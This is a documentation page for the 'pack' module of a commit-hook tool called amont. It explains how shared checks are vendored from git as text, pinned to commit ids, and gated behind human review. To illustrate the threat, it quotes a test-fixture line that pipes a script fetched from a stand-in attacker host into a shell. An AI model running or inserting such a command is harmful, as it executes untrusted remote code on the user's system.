Skip to main content

Module pack

Module pack 

Source
Expand description

Shipping a check — amont add.

A check could always be WRITTEN in amont.conf; it could never be SHARED. The only routes were pasting a line into somebody’s manifest by hand, or upstreaming it into amont itself.

pre-commit solved this by cloning a repository and executing it, building an isolated environment per hook. That is its slowest part and it is precisely what crate::trust exists to refuse — that module’s own test fixture spells out the threat in one line:

pre-commit  a  *  block  curl evil.example | sh

So what ships here is text, not execution. A pack is amont.conf syntax and nothing else; amont add vendors those rows into your manifest; and because the trust fingerprint is content-keyed over the whole file, the append invalidates consent and a human must read every command before any of them can run. The existing gate does the security work. This module only saves the copy-paste.

§Why git, and why that answers “verify against what?”

amont links no crates (scripts/check-no-deps.sh), so it has no TLS and no HTTP client, and must not grow one to fetch a config file. The only network primitive it already uses is git — which turns out to be the right answer rather than a consolation:

  • git is content-addressed. resolve turns a moving @v2 into a commit id before anything is fetched, and fetch then refuses whatever it received unless it hashes to that id.
  • the id, never the tag, is what gets written into amont.conf.
  • SSH, HTTPS, private repositories and self-hosted forges all work already, with the user’s own credentials and none of amont’s.

§Nothing here is on the commit path

amont add is a setup verb. No hook calls into this module, nothing is fetched between git commit and a verdict, and a_pack_costs_the_commit_ path_nothing asserts it.

Structs§

Source
Where a pack came from, and which revision of it.

Constants§

PACK_FILE
The file a pack repository must carry, at its root.

Functions§

block
fetch
The pack’s text at id, or an error.
parse_source
github:owner/repo@v2, forgejo:host/owner/repo, a git URL, or a local path.
resolve
The commit id rev names on the remote, before anything is downloaded.
rows
The rows a pack may contribute, verbatim, or a refusal naming the first thing wrong with it.
splice
manifest with this source’s block replaced, or appended if it has none.